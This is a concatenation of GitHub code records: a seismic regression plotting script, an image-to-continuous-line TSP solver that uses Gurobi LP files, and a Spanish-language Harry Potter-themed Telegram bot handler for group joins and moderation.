se_b = sdev / np.sqrt(np.sum((x - np.mean(x)) * (x - np.mean(x))))\n se_a = sdev * np.sqrt(1.0 / len(x) + np.mean(x) * np.mean(x) /\n np.sum((x - np.mean(x)) * (x - np.mean(x))))\n\n xx = np.linspace(min(x), max(x),\n num=(int(math.ceil((max(x) - min(x)) / 0.1))))\n yy = slope * xx + intercept\n\n # Calculate 95% confidence bounds\n t = st.t.ppf(1.0 - 0.05 / 2, degfree)\n b95 = se_b * t\n a95 = se_a * t\n ratio = abs(slope) / b95\n ratio_round = round(ratio * 100) / 100.0\n lower95 = yy - t * se_y * np.sqrt(1.0 /\n len(x) + ((xx - np.mean(x)) *\n (xx - np.mean(x))) /\n np.sum((xx - np.mean(x)) *\n (xx - np.mean(x))))\n upper95 = yy + t * se_y * np.sqrt(1.0 /\n len(x) + ((xx - np.mean(x)) *\n (xx - np.mean(x))) /\n np.sum((xx - np.mean(x)) *\n (xx - np.mean(x))))\n\n # Let's plot it\n p_x = locs[bin][0]\n p_y = locs[bin][1]\n subfig = axs[p_x][p_y]\n subfig.set_title(\"%s - Ratio: %.2f\" % (titles[bin], ratio_round))\n for event in event_data:\n event_x = event[0]\n event_y = event[1]\n event_color = event[2]\n event_marker = event[3]\n subfig.plot(event_x, event_y,\n event_marker, color=event_color)\n #subfig.plot(x, y, 'k+')\n subfig.plot(xx, yy, color='green', ls='-')\n subfig.plot(xx, lower95, 'r--', xx, upper95, 'r--')\n subfig.set_ylabel('ln(data/model)', size=10)\n subfig.set_xlabel('ln(distance(km))', size=10)\n 
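        # Shared axis limits keep all four period bins directly comparable.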
subfig.set_xlim(0, 6)\n subfig.set_ylim(-1.5, 1.5)\n subfig.grid(True)\n subfig.minorticks_on()\n\n # All done, save plot!\n fig.savefig(output_file, format='png', transparent=False,\n dpi=300)\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n if len(sys.argv) != 2:\n print(\"Usage: %s input_file\" % (sys.argv[0]))\n sys.exit(0)\n\n # Output filename\n input_file = sys.argv[1]\n output_file = \"%s.png\" % (os.path.splitext(input_file)[0])\n method = os.path.basename(input_file).split(\"-\")[0].upper()\n\n # Read input file\n data = read_data(input_file)\n summarize_and_plot_data(data, method, output_file)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SCECcode/bbp","sub_path":"bbp/utils/misc/create_dreger_fig3_color.py","file_name":"create_dreger_fig3_color.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"36796462745","text":"import math \nimport numpy as np\nfrom PIL import Image\nimport subprocess\nimport os.path\nimport cairo\nimport random as rd\n\n\n# ============================== DATA ==============================\nlpMathSymbols = [\"+\", \"-\", \"=\", \"<=\", \"<\", \">\", \">=\"]\n\n# ============================== CODE ==============================\ndef printDico(dico):\n for e in dico:\n print(e, \":\", dico[e])\n\ndef tupleSet2sortedTupleList(tupleSet: set):\n res = list(tupleSet)\n return sorted(res)\n\n# =============== ENVIRONNEMENT MANAGING ===============ojccv\n\ndef createDirectory(dirName):\n parentPath = os.getcwd()\n path = os.path.join(parentPath, dirName)\n if not os.path.isdir(path):\n os.mkdir(path)\ndef createAllDirectories():\n createDirectory(\"Raw\") \n createDirectory(\"LPFiles\") \n createDirectory(\"SolFiles\") \n createDirectory(\"LogFiles\") \n createDirectory(\"Results\") \n\n# =============== GETS ===============\n\ndef getRawName(fileName):\n path = os.getcwd()\n return path + \"/Raw/\" + fileName + \".jpg\"\ndef getLpName(fileName):\n path = os.getcwd()\n return path + \"/LPFiles/\" + fileName + \".lp\"\ndef getSolName(fileName):\n path = os.getcwd()\n return path + \"/SolFiles/\" + fileName + \".sol\"\ndef getLogName(fileName): \n path = os.getcwd()\n return path + \"/LogFiles/\" + fileName + \".log\"\ndef getSvgName(fileName):\n path = os.getcwd()\n return path + \"/Results/\" + fileName + \".svg\"\n\ndef get_a_b_from_var(var: str):\n coords = var[2:]\n coords = coords.replace(\"_\",\" \")\n coords = coords.split()\n a = coords[0]\n b = coords[1]\n return int(a), int(b)\ndef get_cost_a_b(a,b):\n return int(math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2))\ndef get_a_form_coords(x,y, graphCoords):\n for e in graphCoords:\n if (x,y) == e:\n return e\n else:\n raise Exception(\"Coords not here.\")\n\ndef get_connected_vertices(middle, graphMatrix):\n if middle >= len(graphMatrix):\n raise Exception (\"Vertice not in graph\")\n \n before = 0 \n while graphMatrix[middle][before] == 0 and before < len(graphMatrix[0]):\n before += 1\n \n if before >= len(graphMatrix[0]):\n raise Exception (\"No connected Vertices\")\n\n \n after = before + 1 \n while graphMatrix[middle][after] == 0 and after < len(graphMatrix[0]):\n after += 1\n\n if after >= len(graphMatrix[0]):\n raise Exception (\"Only one connected vertex:,\", middle ,\" to \", before)\n \n return before, after\ndef get_previous_vertice(vertex, graphMatrix):\n return get_connected_vertices(vertex, graphMatrix)[0]\ndef get_following_vertice(vertex, graphMatrix):\n return 
get_connected_vertices(vertex, graphMatrix)[1]\n\ndef get_subtour(start, graphMatrix):\n previous, next = get_connected_vertices(start, graphMatrix)\n if previous == next and next == 0:\n return []\n \n current = next\n res = [start]\n while current != start:\n res.append(current)\n before, after = get_connected_vertices(current, graphMatrix)\n if after in res:\n current = before\n else:\n current = after\n if len(res) > len(graphMatrix):\n raise Exception(\"End point never found\")\n return res\ndef get_all_subtours(graphMatrix):\n hasToBeSeen = [i for i in range(len(graphMatrix))]\n subtoursTab = []\n while len(hasToBeSeen) > 0:\n subtour = get_subtour(hasToBeSeen[0], graphMatrix)\n subtoursTab.append(subtour)\n hasToBeSeen = [i for i in hasToBeSeen if i not in subtour]\n return subtoursTab\n\n# =============== RASTERIZATION ===============\ndef cropImage(input, blocksize):\n output = input[:input.find('.')] + \"Cropped.png\"\n \n im = Image.open(input)\n width, height = im.size\n decHeight = height - (height % blocksize)\n decWidth = width - (width % blocksize)\n im1 = im.crop((0, 0, decWidth, decHeight))\n im1 = im1.save(output)\n return im1\n \ndef image2matrix(fileName, blocksize):\n fileName = fileName[:fileName.find('.')] + \".jpg\"\n\n image = Image.open(fileName).convert('RGB')\n \n image = Image.open(fileName).convert('L')\n width, height = image.size\n width = width//blocksize\n height = height//blocksize\n\n arrayIm = np.asarray(image) \n\n m = [[0 for j in range (width)] for i in range (height)]\n \n cpt = 0\n for i in range (height): \n for j in range(width):\n mean = 0\n for k in range(blocksize):\n for l in range(blocksize):\n mean = mean + (arrayIm[blocksize*i + k][blocksize*j + l])\n # m[i][j] = 10 - math.floor(mean/(255*(blocksize**2)) * 10)\n m[i][j] = 3 - int((mean/(255*(blocksize**2)) * 10)//3)\n cpt += m[i][j]\n\n image.close()\n print(\"There is \", cpt, \"Points.\")\n return m\n\n\ndef graphCoordsAndMatrixFromImage(imageName, blocksize):\n \n dotsDensityMatrix = image2matrix(imageName, blocksize)\n height = len(dotsDensityMatrix) \n width = len(dotsDensityMatrix[0]) \n\n res = set()\n for i in range(height):\n for j in range(width):\n\n for k in range(dotsDensityMatrix[i][j]): \n # on choisit k x et k y au hazard dans un pixel et\n # on les déplace dans l'image afin de coller au pixel\n # i j\n x = int(rd.random() * blocksize + j * blocksize)\n y = int(rd.random() * blocksize + i * blocksize)\n res.add((x,y))\n res = tupleSet2sortedTupleList(res)\n \n matrix = [ [0 for i in range(len(res))] for j in range(len(res))]\n for i in range(len(res)):\n for j in range(len(res)):\n matrix[i][j] = get_cost_a_b(res[i], res[j])\n\n return res, matrix\n\n# =============== DRAWINGS ===============\n\ndef showPointsOnly(resultFileName,imageName, blocksize):\n \n graphCoords, graphMatrix = graphCoordsAndMatrixFromImage(imageName, blocksize)\n\n image = Image.open(imageName).convert('L')\n width, height = image.size\n destination = cairo.SVGSurface(resultFileName, width, height)\n cr = cairo.Context(destination)\n \n cr.set_line_width(3)\n cr.set_source_rgb(1,1,1)\n cr.rectangle(0,0, width, height)\n cr.fill()\n\n cr.set_source_rgb(1,0,0)\n for i in range(len(graphCoords)):\n (x,y) = graphCoords[i]\n cr.move_to(x,y)\n cr.rectangle(x -1.5, y -1.5,3,3)\n cr.fill()\n return cr\n\ndef context2png(context, fileName):\n context.get_target().write_to_png(fileName + \".png\")\n\ndef graph2Context(resultFileName, graphMatrix, graphCoords, height, width): \n destination = 
cairo.SVGSurface(resultFileName, width, height)\n cr = cairo.Context(destination)\n \n cr.set_line_width(3)\n cr.set_source_rgb(1,1,1)\n cr.rectangle(0,0, width, height)\n cr.fill()\n\n cr.set_source_rgb(0,0,0)\n for i in range(len(graphMatrix)):\n for j in range(len(graphMatrix[0])):\n if graphMatrix[i][j] != 0:\n (x1,y1) = graphCoords[i]\n (x2,y2) = graphCoords[j]\n cr.move_to(x1, y1)\n cr.line_to(x2,y2) \n cr.stroke()\n return cr\n\ndef addContext(cr1,cr2, matrix, resultFileName, height, width):\n height = len(matrix)\n width = len(matrix[0])\n \n destination = cairo.SVGSurface(resultFileName + \"Together\", width, height)\n resCr = cairo.Context(destination)\n resCr.set_source_surface(cr1.get_target(), 0,0)\n resCr.paint()\n resCr.set_source_surface(cr2.get_target(), 0,0)\n resCr.paint()\n return resCr\n \n# =============== LINEAR PROBLEM ===============\n\ndef strTotalCostDistance(graphMatrix):\n res = \"\"\n for i in range(len(graphMatrix)):\n for j in range(len(graphMatrix[0])):\n if i != j :\n add = \"+ \" + strVar([i,j], graphMatrix[i][j]) \n res += add \n return res[2:]\n\ndef strVertexConstraintsExt(graphMatrix, indexA):\n res = \"\"\n for i in range(len(graphMatrix)):\n if i != indexA:\n add = \" + \" + strVar([i, indexA]) \n res += add \n res = res + \" = 2\"\n return res[2:]\n\ndef strLinksConstraints(i,j):\n res = \"\"\n res = strVar([i,j]) + \" - \" + strVar([j,i]) + \" = 0\"\n return res\n\ndef strSubtourConstraints(graphMatrix, subtour):\n hasToBeSeen = [i for i in range(len(graphMatrix)) if i not in subtour]\n res = \"\"\n for a in subtour:\n for b in hasToBeSeen:\n add = \" + \" + strVar([a, b]) \n res += add \n res = res + \" >= 2\"\n return res[2:]\n\n# =============== FILE CREATION ===============\ndef strVar(indexes: list, scalar = 1):\n res = str(scalar) + \" X\"\n for e in indexes:\n res += \"_\" + str(e) \n return res\n\ndef write(addition: str, fileName):\n f = open(fileName, \"a+\")\n f.write(addition)\n f.write(\"\\n\")\n f.close()\n\ndef decomposeExpr(expr: str):\n noOp = expr # expression sans opérateur\n for op in lpMathSymbols:\n noOp = noOp.replace(op, \" \") \n noOp = noOp.split() # tableau de var, coef et var_coef\n vars_coefs = {} # Init du dico correspondant aux vars + coeff\n operators = expr # opérateur : str == expr\n coefHolder = \"1\" # tant qu'on ne connait pas le coef, on dit que c'est 1\n\n for i in range(len(noOp)):\n operators = operators.replace(noOp[i],\" \",1) # on enlève les vars+coeff\n noOp[i] = noOp[i].replace(\" \", \"\")\n # noOp[i] ressemblera à : 8X1 ou 8 ou X1\n\n coef = \"\" # store le coef\n coefIndex = 0 # l'indice du coef\n\n # tant qu'on reste dans le str et que ce n'est pas une lettre\n while coefIndex < len(noOp[i]) and not noOp[i][coefIndex].isalpha():\n coef += noOp[i][coefIndex] # On l'ajoute comme coef\n coefIndex += 1 # On note sa fin\n\n var = noOp[i][coefIndex:] # On garde le reste\n if coef == \"\": # s'il n'y a pas de coef: alors soit \"X1\" avec facteur 1, soit \"X1\" avec coef dans coef holder \n vars_coefs[var] = coefHolder\n\n elif var == \"\": # s'il n'y a pas de variable: \"8\" => on le retiens pour plus tard (variable ou égalité)\n coefHolder = coef \n else: # il y a coef et var : \"8X1\"\n vars_coefs[var] = coef\n coefHolder = \"1\"\n operators = operators.split()\n return vars_coefs, operators, coefHolder\n\ndef str2Expr(expr: str):\n vars_coefs, operators, coefHolder = decomposeExpr(expr)\n res = \"\"\n if operators[0] == \"=\" or operators[0] == \"<=\" or operators[0] == \">=\":\n res += expr[0] + \" \" 
+ operators[0] + \" \" \n cpt = 1\n for var in vars_coefs.keys():\n coef = vars_coefs[var]\n if coef == \"1\":\n res += \" \" + var + \" \" + operators[cpt] \n else :\n res += \" \" + coef + \" \" + var + \" \" + operators[cpt] \n cpt += 1\n res += \" \" + coefHolder\n return res\n\n else : \n cpt = 0 \n for var in vars_coefs.keys():\n coef = vars_coefs[var]\n if cpt == 0:\n if coef == \"1\":\n res += var\n else :\n res += coef + \" \" + var\n else:\n if coef == \"1\":\n res += \" \" + operators[cpt-1] + \" \" + var\n else:\n res += \" \" + operators[cpt-1] + \" \" + coef + \" \" + var\n cpt += 1\n\n if operators[-1] == \"=\" or operators[-1] == \"<=\" or operators[-1] == \">=\":\n res += \" \" + operators[-1] + \" \" + coefHolder\n return res\n\ndef createLPfileGraph(fileName, graphCoords, graphMatrix, allSubtours = [[]]):\n # graph ici correspond a un ensemble de point sans transiitions\n # il deviendra un graphe avec toutes les transtition possible sauf boucle\n # states correspond a une liste de tuple ordonné dans l'ordre alphabetique\n vars = decomposeExpr(strTotalCostDistance(graphMatrix))[0]\n\n # =============== MIN/MAX ===============\n \n write('minimize', fileName)\n totalCost = str2Expr(strTotalCostDistance(graphMatrix))\n write(totalCost, fileName)\n \n # =============== RESTRICTIONS ===============\n\n write(\"subject to\", fileName)\n\n for i in range(len(graphCoords)):\n \n vertexConstraintExt = strVertexConstraintsExt(graphMatrix, i)\n write(vertexConstraintExt, fileName)\n\n for i in range(len(graphCoords)):\n for j in range(len(graphCoords)):\n if i != j :\n LinksConstraints = strLinksConstraints(i,j)\n write(LinksConstraints, fileName)\n \n if len(allSubtours) != 1:\n for subtour in allSubtours:\n SubTourConstraint = strSubtourConstraints(graphMatrix, subtour)\n write(SubTourConstraint, fileName)\n\n\n # =============== BOUNDS ===============\n \n write(\"binary\", fileName)\n for v in vars:\n a,b = get_a_b_from_var(v)\n if a == b:\n raise Exception(\"a == b\")\n write(v, fileName)\n \n write(\"end\", fileName)\n \n return None\n\n# =============== MAIN ===============\n\ndef solFile2Graph(solFile, graphMatrix):\n with open(solFile) as f:\n cpt = 0\n for line in f:\n if cpt != 0:\n var, value = line.split() \n if value != \"1\":\n a, b = get_a_b_from_var(var)\n graphMatrix[a][b] = 0\n cpt += 1 \n return graphMatrix\n\ndef main(fileName, graphCoords, graphMatrix, height, width):\n createAllDirectories()\n allSubTours = [[]]\n cpt = 0\n numberOfSubTours = 0\n\n while numberOfSubTours != 1 and cpt < 10:\n lpName = getLpName(fileName + \"_\" + str(cpt))\n solName = getSolName(fileName + \"_\" + str(cpt))\n logName = getLogName(fileName + \"_\" + str(cpt))\n svgName = getSvgName(fileName + \"_\" + str(cpt))\n \n copyOfGraphMatrix = [row[:] for row in graphMatrix]\n\n if os.path.isfile(lpName): os.remove(lpName)\n createLPfileGraph(lpName, graphCoords, copyOfGraphMatrix, allSubTours)\n subprocess.run([\"gurobi_cl\", \"Resultfile=\" + solName , \"Logfile=\" + logName, \" Method=0\", lpName ])\n\n resultGraph = solFile2Graph(solName, copyOfGraphMatrix)\n if allSubTours == [[]]: allSubTours = get_all_subtours(resultGraph)\n\n drawing = graph2Context(svgName, resultGraph, graphCoords, height, width)\n for subTour in get_all_subtours(resultGraph):\n allSubTours.append(subTour)\n \n numberOfSubTours = len(get_all_subtours(resultGraph)) \n cpt += 1\n \n return drawing\n\ndef mainImage(fileName, blocksize):\n createAllDirectories()\n\n graphCoords, graphMatrix = 
graphCoordsAndMatrixFromImage(getRawName(fileName), blocksize)\n height = len(graphMatrix) \n width = len(graphMatrix[0]) \n allSubTours = [[]]\n cpt = 0\n numberOfSubTours = 0\n \n while numberOfSubTours != 1 and cpt < 50:\n lpName = getLpName(fileName + \"_\" + str(cpt))\n solName = getSolName(fileName + \"_\" + str(cpt))\n logName = getLogName(fileName + \"_\" + str(cpt))\n svgName = getSvgName(fileName + \"_\" + str(cpt))\n \n copyOfGraphMatrix = [row[:] for row in graphMatrix]\n\n if os.path.isfile(lpName): os.remove(lpName)\n createLPfileGraph(lpName, graphCoords, copyOfGraphMatrix, allSubTours)\n subprocess.run([\"gurobi_cl\", \"Resultfile=\" + solName , \"Logfile=\" + logName, \" Method=0\", lpName ])\n\n resultGraph = solFile2Graph(solName, copyOfGraphMatrix)\n if allSubTours == [[]]: allSubTours = get_all_subtours(resultGraph)\n\n drawing = graph2Context(svgName, resultGraph, graphCoords, height, width)\n for subTour in get_all_subtours(resultGraph):\n allSubTours.append(subTour)\n \n numberOfSubTours = len(get_all_subtours(resultGraph)) \n cpt += 1\n return drawing\n\n# ============================== TEST ==============================\n\n# print(createGraphWithRandomPoints(100,100, 10))\n# print(makeAllTransition(createGraphWithRandomPoints(100,100, 10)))\n# print(G.removeNullDistance(makeAllTransition(createGraphWithRandomPoints(100,100, 10))))\n\n\n# main(\"Test\", graphCoords, graphMatrix, 500, 500)\n\n# showPointsOnly(\"Results/Skull.svg\", \"Raw/Skull.jpg\" , 14)\n# mainImage(\"Skull\", 14)\n\n# print(image2matrix(\"Raw/Skull.jpg\", 10))\n# il y a 2229 points. Lancé le 6 Juillet à 17 h 45\n# graphCoords, graphMatrix = graphCoordsAndMatrixFromImage(getRawName(\"Eye\"), 10)\n# print(graphCoords)\n# print(graphMatrix)\n\"\"\"\n# print(graphMatrix)\n\ndef print_coords_list(list):\n for e in list:\n print(graphCoords[e])\n \nsubTour0 = get_subtour(0, graphMatrix)\nprint(subTour0)\nprint_coords_list(subTour0)\n\nallSubTours = get_all_subtours(graphMatrix)\nn = 0\nfor list in allSubTours:\n print(list)\n n += len(list)\n print_coords_list(list)\n\nprint(\"There is :\", len(allSubTours),\" subtours.\")\nprint(\"There is :\", n,\" vertices.\")\n\n# print(tupleSet2tupleList({ (0,1), (1,1), (8,1), (1,8), (2,1), (0,2), (0,0), (7,8), (1,7)}))\nprint(image2matrix(\"Raw/SOAD.jpg\", 5))\n\n\"\"\"\n\n# print(image2matrix(\"Raw/Skull.jpg\", 10))\n","repo_name":"GervaisAzevedo/OptArtImplementations","sub_path":"Chap5/ContinuousLine.py","file_name":"ContinuousLine.py","file_ext":"py","file_size_in_byte":17314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22935067597","text":"import re\nimport time\n\nimport telegram\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Bot\nfrom telegram.ext.dispatcher import run_async\nfrom telegram.utils.helpers import escape_markdown\n\nimport profdumbledorebot.nanny as nanny\nimport profdumbledorebot.sql.group as group_sql\nimport profdumbledorebot.supportmethods as support\nfrom profdumbledorebot.config import get_config\nfrom profdumbledorebot.model import ValidationRequiered, Houses, Professions\nfrom profdumbledorebot.sql.admin import get_particular_admin, get_admin_from_linked, get_admin, set_admin_settings\nfrom profdumbledorebot.sql.rules import has_rules\nfrom profdumbledorebot.sql.settings import get_join_settings, get_group_settings\nfrom profdumbledorebot.sql.support import are_banned\nfrom profdumbledorebot.sql.user import get_user, is_staff, is_ghost\nfrom 
profdumbledorebot.sql.usergroup import exists_user_group, set_user_group, join_group, message_counter\nfrom profdumbledorebot.sql.welcome import get_welc_pref\nfrom profdumbledorebot.welcome import send_welcome\nfrom profdumbledorebot.games.utils import game_selection\n\n\n@run_async\ndef joined_chat(bot, update, job_queue):\n chat_id, chat_type, user_id, text, message, message_type = support.extract_update_info(update)\n new_chat_member = message.new_chat_members[0] if message.new_chat_members else None\n\n config = get_config()\n bot_alias = config['telegram']['bot_alias']\n\n if new_chat_member.username == bot_alias:\n if are_banned(user_id, chat_id):\n bot.leaveChat(chat_id=chat_id)\n return\n\n chat_title = message.chat.title\n chat_id = message.chat.id\n group = group_sql.get_real_group(chat_id)\n if group is None:\n group_sql.set_group(chat_id, message.chat.title)\n\n message_text = (\n \"Si necesitais ayuda podéis lanzar chispas rojas c\"\n \"on vuestra varita o utilizando el comando `/help`\"\n \" para conocer todas las funciones. Aseguraos de v\"\n \"er la ayuda para prefectos de los grupos, donde s\"\n \"e explica en detalle todos los pasos que se deben\"\n \" seguir.\".format(escape_markdown(chat_title)))\n\n admin = get_admin(chat_id)\n if admin is not None and admin.admin_bot is True:\n set_admin_settings(chat_id, \"admin_bot\")\n message_text = message_text + \"\\n\\n*Fawkes emprendió el vuelo.*\"\n\n\n bot.sendMessage(\n chat_id=chat_id, \n text=message_text, \n parse_mode=telegram.ParseMode.MARKDOWN)\n\n elif new_chat_member.username != bot_alias:\n chat_id = message.chat.id\n user_id = update.effective_message.new_chat_members[0].id\n\n group = get_join_settings(chat_id)\n if group is not None:\n if group.delete_header:\n support.delete_message(chat_id, message.message_id, bot)\n\n if are_banned(user_id, user_id):\n bot.kickChatMember(chat_id, user_id)\n return\n\n user = get_user(user_id)\n staff = is_staff(user_id)\n ghost = is_ghost(user_id)\n\n if user is None and group.requirment is not ValidationRequiered.NO_VALIDATION.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago sin registrarse expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN)\n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n return\n\n elif ghost is True:\n if group.requirment is ValidationRequiered.GRYFFINDOR.value or ValidationRequiered.HUFFLEPUFF.value or ValidationRequiered.SLYTHERIN.value or ValidationRequiered.RAVENCLAW.value and user.house is group.requirment:\n if group.val_alert is False:\n output = \"👻 Peeves ha entrado en la casa a hacer de las suyas, estad atentos.\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN)\n\n elif group.requirment is ValidationRequiered.GRYFFINDOR.value and user.house is not Houses.GRYFFINDOR.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago infiltrado expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN) \n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n try:\n bot.sendMessage(\n chat_id=user_id, \n text=\"❌ Debes validarte para entrar en este grupo\", \n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception:\n pass\n return\n\n elif 
group.requirment is ValidationRequiered.HUFFLEPUFF.value and user.house is not Houses.HUFFLEPUFF.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago infiltrado expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN) \n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n try:\n bot.sendMessage(\n chat_id=user_id, \n text=\"❌ Debes validarte para entrar en este grupo\", \n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception:\n pass\n return\n\n elif group.requirment is ValidationRequiered.RAVENCLAW.value and user.house is not Houses.RAVENCLAW.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago infiltrado expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN) \n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n try:\n bot.sendMessage(\n chat_id=user_id, \n text=\"❌ Debes validarte para entrar en este grupo\", \n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception:\n pass\n return\n\n elif group.requirment is ValidationRequiered.SLYTHERIN.value and user.house is not Houses.SLYTHERIN.value and staff is False:\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n if group.val_alert is False:\n output = \"👌 Mago infiltrado expulsado!\"\n bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN) \n good_luck(bot, chat_id, message, \"El usuario no está registrado\")\n try:\n bot.sendMessage(\n chat_id=user_id, \n text=\"❌ Debes validarte para entrar en este grupo\", \n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception:\n pass\n return\n \n if group.max_members is not None and group.max_members > 0 and bot.get_chat_members_count(chat_id) >= group.max_members and staff is False:\n if group.val_alert is False:\n output = \"❌ El número máximo de integrantes en el grupo ha sido alcanzado\"\n sent = bot.sendMessage(\n chat_id=chat_id, \n text=output, \n parse_mode=telegram.ParseMode.MARKDOWN)\n delete_object = support.DeleteContext(chat_id, sent.message_id)\n job_queue.run_once(\n support.callback_delete, \n 10,\n context=delete_object\n )\n time.sleep(2)\n bot.kickChatMember(chat_id=chat_id, user_id=user_id, until_date=time.time()+31)\n return\n\n if (not exists_user_group(user_id, chat_id)):\n set_user_group(user_id, chat_id)\n else:\n join_group(user_id, chat_id)\n\n if has_rules(chat_id) and staff is False:\n bot.restrict_chat_member(\n chat_id,\n user_id,\n until_date=0,\n can_send_messages=False,\n can_send_media_messages=False,\n can_send_other_messages=False,\n can_add_web_page_previews=False)\n\n if get_welc_pref(chat_id):\n sent = send_welcome(bot, update)\n if sent is not None and group.delete_cooldown is not None and group.delete_cooldown > 0:\n delete_object = support.DeleteContext(chat_id, sent.message_id)\n job_queue.run_once(\n support.callback_delete, \n group.delete_cooldown,\n context=delete_object\n )\n '''\n if group.val_alert and (user is None or user.level is None):\n sent = bot.sendMessage(\n chat_id=chat_id,\n text=\"\",\n parse_mode=telegram.ParseMode.MARKDOWN\n )\n if sent is not None:\n delete_object = support.DeleteContext(chat_id, sent.message_id)\n job_queue.run_once(\n support.callback_delete, \n group.delete_cooldown or 60,\n 
context=delete_object\n )\n '''\n ladmin = get_particular_admin(chat_id)\n if ladmin is not None and ladmin.welcome:\n admin = get_admin_from_linked(chat_id)\n buttons = [\n [InlineKeyboardButton(text=\"🚫 Ban\", callback_data=f\"adm_ban_{user_id}\"),\n InlineKeyboardButton(text=\"❌ Kick\", callback_data=f\"adm_kick_{user_id}\"),\n InlineKeyboardButton(text=\"⚠️ Warn\", callback_data=f\"adm_warn_{user_id}\")]\n ]\n if admin is not None and admin.welcome and admin.admin_bot:\n config = get_config()\n adm_bot = Bot(token=config[\"telegram\"][\"admin_token\"])\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} ha entrado en el grupo\").format(message.chat.title, replace_pogo)\n adm_bot.sendMessage(\n chat_id=admin.id,\n text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(buttons)\n )\n elif admin is not None and admin.welcome :\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} ha entrado en el grupo\").format(message.chat.title, replace_pogo)\n bot.sendMessage(\n chat_id=admin.id,\n text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(buttons)\n )\n\n\ndef good_luck(bot, chat_id, message, text):\n ladmin = get_particular_admin(chat_id)\n user_id = message.from_user.id\n if ladmin is not None and ladmin.welcome:\n admin = get_admin_from_linked(chat_id)\n if admin is not None and admin.welcome and admin.admin_bot:\n config = get_config()\n adm_bot = Bot(token=config[\"telegram\"][\"admin_token\"])\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} {}\").format(message.chat.title, replace_pogo, text)\n adm_bot.sendMessage(chat_id=admin.id, text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN)\n elif admin is not None and admin.welcome:\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} {}\").format(message.chat.title, replace_pogo, text)\n bot.sendMessage(chat_id=admin.id, text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n\n@run_async\ndef process_group_message(bot, update, job_queue):\n chat_id, chat_type, user_id, text, message, message_type = support.extract_update_info(update)\n msg = update.effective_message\n \n if are_banned(user_id, chat_id):\n return\n \n group = group_sql.get_group(chat_id)\n if group is None:\n group_sql.set_group(chat_id, message.chat.title)\n if not exists_user_group(user_id, chat_id):\n set_user_group(user_id, chat_id)\n \n message_counter(user_id, chat_id)\n if get_group_settings(chat_id).games == True and (chat_type == 'supergroup' or chat_type == 'group'):\n game_selection(bot, update)\n\n if text is None or msg.photo is None:\n if msg and msg.document:\n nanny.process_gif(bot, update, job_queue)\n return\n elif msg and msg.contact:\n nanny.process_contact(bot, update, job_queue)\n return\n elif msg and msg.game:\n nanny.process_game(bot, update, job_queue)\n return\n elif msg and msg.location or msg.venue:\n nanny.process_ubi(bot, update, job_queue)\n return\n elif msg and msg.photo:\n nanny.process_pic(bot, update, job_queue)\n return\n elif msg and msg.sticker:\n nanny.process_sticker(bot, update, job_queue)\n return\n elif msg and msg.voice or msg.audio:\n nanny.process_voice(bot, update, job_queue)\n return\n elif msg and msg.video or msg.video_note:\n nanny.process_video(bot, update, 
